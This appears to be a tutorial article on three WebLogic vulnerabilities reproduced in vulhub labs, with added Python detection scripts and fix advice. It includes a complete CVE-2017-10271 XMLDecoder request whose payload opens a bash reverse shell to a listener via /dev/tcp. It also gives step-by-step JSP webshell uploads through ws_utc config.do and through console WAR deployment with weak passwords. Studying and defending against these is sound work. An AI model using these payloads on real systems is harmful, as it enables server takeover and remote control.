WebLogic middleware vulnerability collection

1. Deserialization

2. Arbitrary file upload

3. Deploying a WAR package through the administration console (background)

1. WebLogic XMLDecoder deserialization vulnerability (CVE-2017-10271)

1. Vulnerability description

WebLogic's WLS Security component exposes web services to the outside world. It uses XMLDecoder to parse the XML data supplied by the user, and a deserialization vulnerability during parsing allows arbitrary commands to be executed.

2. Affected versions

10.3.6.0.0

12.1.3.0.0

12.2.1.1.0

12.2.1.2.0

3. Environment setup

Use Docker to pull the vulhub image and start the environment:

docker-compose up -d

Visit http://your-ip:7001/ and you will see a 404 page, which indicates that WebLogic has started successfully.

Path scanning shows that http://192.168.0.130:7001/wls-wsat/CoordinatorPortType is reachable; when the following page appears, the vulnerable component is present.

4. Reproduction process

(1) With a tool

The tool detects the vulnerability.

(2) Without a tool

Visit http://192.168.0.130:7001/wls-wsat/CoordinatorPortType

Use Burp Suite to capture the request,

change the GET method to POST
and replace the request body with the payload below.

Note that the reverse-shell command must be XML-encoded (for example &gt; and &amp; for > and &), otherwise the XML fails to parse with a format error.

Also set the Content-Type request header to text/xml.

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.0.130:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 633

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/192.168.0.119/4444 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

The listener receives the connection, and commands can be executed.

Fix

1. Apply the corresponding Oracle patches.

2. Create ACL rules on firewalls, routers and switches to restrict access to the wls-wsat resource.

3. Where it does not affect the business, delete the corresponding WAR package.
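As an added example (not code from the original article or from vulhub), the following Python inspector shows what a reverse proxy or WAF in front of WebLogic can check for this vulnerability: a POST to the wls-wsat paths whose text/xml body carries a java.beans.XMLDecoder document that instantiates a process-spawning class. The sample bodies are constructed here and use a harmless echo command; the path prefix and class list are assumptions for the example.

```python
"""Request inspection for CVE-2017-10271-style payloads (added example, not from the article)."""
import xml.etree.ElementTree as ET

# Path prefix of the wls-wsat component (fix 2 in the article restricts access to it).
WLS_WSAT_PREFIX = "/wls-wsat/"

# Classes that have no business appearing inside a SOAP WorkContext header.
# Constructed list for this example; extend it to match your own policy.
SUSPICIOUS_CLASSES = {
    "java.lang.ProcessBuilder",
    "java.lang.Runtime",
    "java.io.FileOutputStream",
}


def xmldecoder_findings(body):
    """Return a list of findings for XMLDecoder gadgets inside an XML body.

    Every element is visited. An empty list means neither an XMLDecoder
    document nor a suspicious class was seen. Malformed XML is reported
    too: a parse error is exactly what the article warns about when the
    command is not entity-encoded.
    """
    try:
        root = ET.fromstring(body)
    except ET.ParseError as exc:
        return [f"unparseable xml: {exc}"]
    findings = []
    for elem in root.iter():
        cls = elem.get("class", "")
        # <java class="java.beans.XMLDecoder"> is the root of the gadget document.
        if elem.tag == "java" and cls == "java.beans.XMLDecoder":
            findings.append("XMLDecoder document in SOAP header")
        if cls in SUSPICIOUS_CLASSES:
            findings.append(f"instantiates {cls}")
        # <void method="start"/> is the call that launches the process.
        if elem.tag == "void" and elem.get("method") == "start":
            findings.append("calls method start (process launch)")
    return findings


def inspect_request(method, path, headers, body):
    """Classify one request as ("block" | "review" | "allow", findings).

    "block": wls-wsat path and an XMLDecoder gadget in the body.
    "review": only one of the two conditions holds.
    """
    on_wls_wsat = path.startswith(WLS_WSAT_PREFIX)
    ctype = headers.get("Content-Type", "").lower()
    findings = []
    if method.upper() == "POST" and ctype.startswith("text/xml") and body:
        findings = xmldecoder_findings(body)
    if on_wls_wsat and findings:
        return "block", findings
    if on_wls_wsat or findings:
        return "review", findings
    return "allow", findings


# Constructed sample with the shape of the article's request and a harmless command.
GADGET_BODY = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="2">
<void index="0"><string>/bin/echo</string></void>
<void index="1"><string>hello &amp; welcome</string></void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>"""

# Constructed benign SOAP request for comparison.
BENIGN_BODY = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header/>
<soapenv:Body><ping>1</ping></soapenv:Body>
</soapenv:Envelope>"""

if __name__ == "__main__":
    xml_hdr = {"Content-Type": "text/xml"}
    print(inspect_request("POST", "/wls-wsat/CoordinatorPortType", xml_hdr, GADGET_BODY))
    print(inspect_request("POST", "/wls-wsat/CoordinatorPortType", xml_hdr, BENIGN_BODY))
    print(inspect_request("GET", "/index.jsp", {}, ""))
```

The inspector parses the body rather than grepping it, so entity-encoded content (the &gt; and &amp; the article mentions) is decoded before the class names are compared, and a document that is not well-formed is flagged instead of silently passed through.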

2. WebLogic arbitrary file upload vulnerability

Vulnerability description

Two unauthenticated pages on the WebLogic administration side allow arbitrary file upload (getshell), so a webshell can be obtained directly.

Affected versions
weblogic 10.3.6.0, weblogic 12.1.3.0, weblogic 12.2.1.2, weblogic 12.2.1.3.

1. Start the environment

docker-compose up -d

2. Reproducing the vulnerability

Run the following command to view the administrator password. The administrator username is weblogic and the password is pIeaMV7G.

docker-compose logs | grep password

Log in to WebLogic with the above account and password:

http://192.168.150.146:7001/console/login/LoginForm.jsp

After logging in to the console, open the configuration of base_domain, tick the 'Enable Web Service Test Page' option under 'Advanced', and save the configuration.

Visit http://192.168.150.146:7001/ws_utc/config.do and set the Work Home Dir to /u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

Then click 'Security' -> 'Add' and upload a JSP webshell.

Record the timestamp in the response.

Access http://your-ip:7001/ws_utc/css/config/keystore/[timestamp]_[file name] to reach the webshell:

http://192.168.0.130:7001/ws_utc/css/config/keystore/1697639529121_ma1.jsp

Password: admin

Success.

Repair suggestions:

(1) Require login authorization before the config.do and begin.do pages can be accessed
(2) Update the product version and install security patches
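As an added example (not from the original article), here is a Python review of WebLogic HTTP access-log lines for the traces this technique leaves: hits on the unauthenticated test-client pages config.do and begin.do that repair suggestion (1) talks about, and requests for files under /ws_utc/css/config/keystore/, whose names start with the upload timestamp in milliseconds followed by the original file name. The log lines are constructed and assumed to be in the common log format; the severity labels are this example's own choice.

```python
"""Access-log review for the ws_utc upload path (added example, not from the article)."""
import re
from datetime import datetime, timezone

# Common log format: ip ident user [time] "method path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# The two test-client pages that should never answer without a login.
TEST_CLIENT_PAGES = ("/ws_utc/config.do", "/ws_utc/begin.do")

# Uploaded files are served as <13-digit ms timestamp>_<original name>.
KEYSTORE_RE = re.compile(r"^/ws_utc/css/config/keystore/(?P<ts>\d{13})_(?P<name>[^/?]+)")


def parse_line(line):
    """Return the fields of one common-log-format line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def review_access_log(lines):
    """Return a list of (severity, client_ip, message) alerts, in log order."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]
        if path in TEST_CLIENT_PAGES:
            # A 200 means the page was served; a redirect to the login form is expected.
            sev = "high" if rec["status"] == "200" else "info"
            alerts.append((sev, rec["ip"], f"{rec['method']} {path} returned {rec['status']}"))
        m = KEYSTORE_RE.match(path)
        if m:
            # The file name records when the server stored the upload (UTC).
            uploaded = datetime.fromtimestamp(int(m["ts"]) / 1000, tz=timezone.utc)
            sev = "critical" if m["name"].lower().endswith((".jsp", ".jspx")) else "high"
            alerts.append((sev, rec["ip"],
                           f"keystore file {m['name']} uploaded {uploaded:%Y-%m-%d %H:%M:%S}Z requested"))
    return alerts


# Constructed sample log; the timestamp in the file name is the one shown in the article.
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Oct/2023:14:31:50 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 3121',
    '10.0.0.5 - - [18/Oct/2023:14:31:58 +0000] "GET /ws_utc/config.do HTTP/1.1" 200 8812',
    '10.0.0.5 - - [18/Oct/2023:14:32:20 +0000] "GET /ws_utc/css/config/keystore/1697639529121_ma1.jsp HTTP/1.1" 200 77',
    '10.0.0.9 - - [18/Oct/2023:14:40:00 +0000] "GET /ws_utc/begin.do HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for alert in review_access_log(SAMPLE_LOG):
        print(alert)
```

A keystore request for a .jsp file is the strongest signal: the test client is meant to store certificates and keystores there, not server pages, and the timestamp in the name tells you when the file landed even if the upload request itself was not logged.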

3. WebLogic: deploying a WAR package through the administration console (background)

1. Principle of the vulnerability

After the WebLogic service is set up, the default console password is not changed, or the password chosen is too simple, so a user can log in with the weak password and eventually gain control of the server.

2. Affected version

Weblogic version: 10.3.6

Java version: 1.6

3. Environment setup

Use Docker to pull the vulhub image and start the environment:

docker-compose up -d

Visit http://your-ip:7001/ and you will see a 404 page, which indicates that WebLogic has started successfully.

Open the console (background) at http://192.168.0.116:7001/console/login/LoginForm.jsp

This environment has the weak password weblogic/Oracle@123.

Select Deployments on the left and click Install.

You will then see an option to upload a file. Here you can upload a WAR package containing a small JSP webshell to get a shell.

Create a new folder containing only ma1.jsp and run:

jar -cvf test.war .

test.war is the name of the archive generated by packaging.

The trailing . means package all files in the current directory.

Upload the WAR package we made and keep clicking Next.

Click Save; it reports that the change was successful, and the uploaded webshell can then be connected to.

The connection succeeds. Here test is the name of our WAR package and shell.jsp is the small webshell inside it.

Password: admin

4. Defense and repair

1. Require login authorization before the Config.do page can be accessed;
2. IPS and other defensive products can add corresponding signatures;
3. Upgrade to the latest official version
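As an added example (not from the original article), the Python scanner below reverses the jar -cvf step from the deployment walkthrough: a WAR is a ZIP archive, so a deployment gate or a post-incident review can open it, list its JSP pages and report which process-execution or class-loading APIs each page calls. The archives are built in memory from constructed samples; the pattern list and the "single-page WAR" heuristic are this example's own assumptions, and the sample page only runs a fixed command so that the indicator is present without the sample being a working shell.

```python
"""Inspect a WAR for suspicious JSP pages before or after deployment (added example, not from the article)."""
import io
import re
import zipfile

# Java constructs worth a second look inside a JSP. Constructed list for this example.
SUSPICIOUS_PATTERNS = {
    "Runtime.exec": re.compile(r"Runtime\s*\.\s*getRuntime\s*\(\s*\)\s*\.\s*exec"),
    "ProcessBuilder": re.compile(r"\bProcessBuilder\b"),
    "ClassLoader.defineClass": re.compile(r"defineClass\s*\("),
}


def scan_war(war_bytes):
    """Return {"entries": n, "jsp": {name: [pattern names]}, "verdict": str}.

    verdict is "reject" when any JSP matches a pattern, "review" when the
    archive is a single JSP page (unusual for a real application, typical
    for a dropped webshell), otherwise "clean".
    """
    report = {"entries": 0, "jsp": {}, "verdict": "clean"}
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        for info in war.infolist():
            if info.is_dir():
                continue
            report["entries"] += 1
            if not info.filename.lower().endswith((".jsp", ".jspx")):
                continue
            src = war.read(info).decode("utf-8", errors="replace")
            report["jsp"][info.filename] = [
                name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(src)
            ]
    if any(report["jsp"].values()):
        report["verdict"] = "reject"
    elif report["entries"] == 1 and report["jsp"]:
        report["verdict"] = "review"
    return report


def build_war(files):
    """Pack {name: content} into an in-memory WAR, like jar -cvf on a directory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        for name, content in files.items():
            war.writestr(name, content)
    return buf.getvalue()


# Constructed sample: a lone page that spawns a fixed process (not a working shell).
SUSPICIOUS_PAGE = '<%@ page import="java.io.*" %><% Runtime.getRuntime().exec("uname -a"); %>'

# Constructed sample: a small ordinary application.
ORDINARY_APP = {
    "index.jsp": "<html><body>Hello at <%= new java.util.Date() %></body></html>",
    "WEB-INF/web.xml": '<web-app><display-name>demo</display-name></web-app>',
}

if __name__ == "__main__":
    print(scan_war(build_war({"ma1.jsp": SUSPICIOUS_PAGE})))
    print(scan_war(build_war(ORDINARY_APP)))
```

Running the scanner over a WAR uploaded through the console (or over the archives already present in the domain's deployment directories) turns the article's "1. Principle" into something checkable: even when a weak password lets someone reach the Install button, the archive that arrives can still be inspected before it is activated.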


syntaxbug.com © 2021 All Rights Reserved.